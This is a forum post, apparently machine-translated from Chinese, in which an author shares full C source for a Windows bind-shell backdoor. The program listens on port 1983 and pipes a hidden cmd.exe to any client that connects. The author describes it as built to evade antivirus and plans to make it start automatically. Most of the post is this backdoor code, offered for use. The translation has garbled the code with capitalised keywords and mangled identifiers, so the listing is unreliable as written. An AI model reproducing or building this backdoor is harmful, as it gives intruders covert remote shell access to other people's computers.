A simple shell Backdoor
Author: Pony/smallhorse [e.s. t VIP] (it doesn't matter if you do not write this e.s. t VIP)
Source: evil baboons China
Recently, I was bored and thought about writing a simple shell backdoor. At the same time, anti-virus software K can avoid intrusion. Refer to the T-CMD source code and the previous article related to anti-black. I learned a lot.
The program is very simple. After running the program, port 1983 is opened by default. You can also set the port and wait for the client to connect. You can use NC for the connection. I also wanted to design a service to enable it to run automatically after it is turned on. Due to time issues, it will be improved later.
Usage: The smallhorse [-P port]-p parameter is used to set your own port
The following is the source program, which is posted here to help you learn and make progress together. I hope that you will not give me any advice. Here, I would like to thank you.
QQ: 11189658 E-MAIL: horse_man@163.com
Compiled in VC ++ 6.0 win2003
# Include <winsock2.h>
# Include <stdio. h>
# Pragma comment (Lib, "ws2_32.lib ")
Int Port = 1983;
DWORD winapi clientthread (lpvoid lpparam );
Void help ()
{Printf ("/*********************************** * *** // n ");
Printf ("| this smallhorse's first choice shell v0.1 |/N ");
Printf ("| thanks for using it! |/N ");
Printf ("| smallhorse [e.s. T] VIP 2005.03 |/N ");
Printf ("| ************************************ * ** |/N ");
Printf ("| usage: smallhorse [-P port] |/N ");
Printf ("| Port: port number to listen on |/N ");
Printf ("| default port is 1983 |/N ");
Printf ("//*********************************** * *** // n ");
Return;
}
Void opendoor ()
{
// Initialize Winsock.
Wsadata;
Socket m_socket, acceptclient;
Sockaddr_in service, client;
Int clientsize, I = 0;
Int iresult = wsastartup (makeword (2, 2), & wsadata );
If (iresult! = No_error)
Return;
// Create a socket.
M_socket = socket (af_inet, sock_stream, ipproto_tcp );
If (m_socket = socket_error)
Return;
Service. sin_family = af_inet;
Service. sin_addr.s_addr = htonl (inaddr_any );
Service. sin_port = htons (port );
If (BIND (m_socket, (sockaddr *) & service, sizeof (Service) = socket_error)
Return; // specify
If (Listen (m_socket, 5) = socket_error)
Return; // a maximum of five listeners can be queued.
Printf ("/nsmallhorse listen on port: % d... ^ * ^/N", Port );
Clientsize = sizeof (client );
While (1)
{
Acceptclient = accept (m_socket, (sockaddr *) & client, & clientsize );
If (acceptclient = socket_error)
Return; // accept the connection
Printf ("Client Connected./N ");
Char * sendbuf = "/********************************** * *** // n/tthanks for using... /n/tsmallhorse's writable shell! /N/tgood luck! /N //************************************ * ** // n/n ";
Send (acceptclient, sendbuf, strlen (sendbuf), 0 );
If (createthread (null, 0, clientthread, (lpvoid) & acceptclient, 0, null) = NULL)
Printf ("create thread error! /N ");
Sleep (1000 );
}
Wsacleanup ();
Return;
}
DWORD winapi clientthread (lpvoid lpparam)
{Int ret;
Char Buf [1024];
Handle rpipe, wpipe, wfile, rfile;
Socket acceptclient = (socket) * (socket *) lpparam;
Security_attributes SA;
SA. nlength = sizeof (SA );
SA. binherithandle = true;
SA. lpsecuritydescriptor = NULL;
Ret = createpipe (& rpipe, & rfile, & SA, 0 );
Ret = createpipe (& wfile, & wpipe, & SA, 0); // create two pipelines for receiving commands and Displaying results respectively.
Startupinfo startinfo;
Getstartupinfo (& startinfo );
Startinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Startinfo. hstdinput = wfile;
Startinfo. hstderror = startinfo. hstdoutput = rfile;
Startinfo. wshowwindow = sw_hide;
Char character line [max_path];
Getsystemdirectory (cmdline, max_path );
Strcat (cmdline, ("// cmd.exe "));
Process_information proinfo;
Ret = CreateProcess (using line, null, & startinfo, & proinfo );
Unsigned long byterec;
While (1)
{
Sleep (100 );
Peeknamedpipe (rpipe, Buf, 1024, & byterec, 0, 0 );
If (byterec ){
Ret = readfile (rpipe, Buf, byterec, & byterec, 0 );
If (! RET)
Break;
Ret = Send (acceptclient, Buf, byterec, 0 );
If (Ret <= 0)
Break;
}
Else {
Byterec = Recv (acceptclient, Buf, 1024,0 );
If (byterec <= 0)
Break;
Ret = writefile (wpipe, Buf, byterec, & byterec, 0 );
If (! RET)
Break;
}
}
Return 0;
}
Int main (INT argc, char * argv [])
{
Help ();
If (argc = 3)
If (! Strcmp (argv [1], "-P "))
Port = atoi (argv [2]);
Opendoor ();
Return 0;
}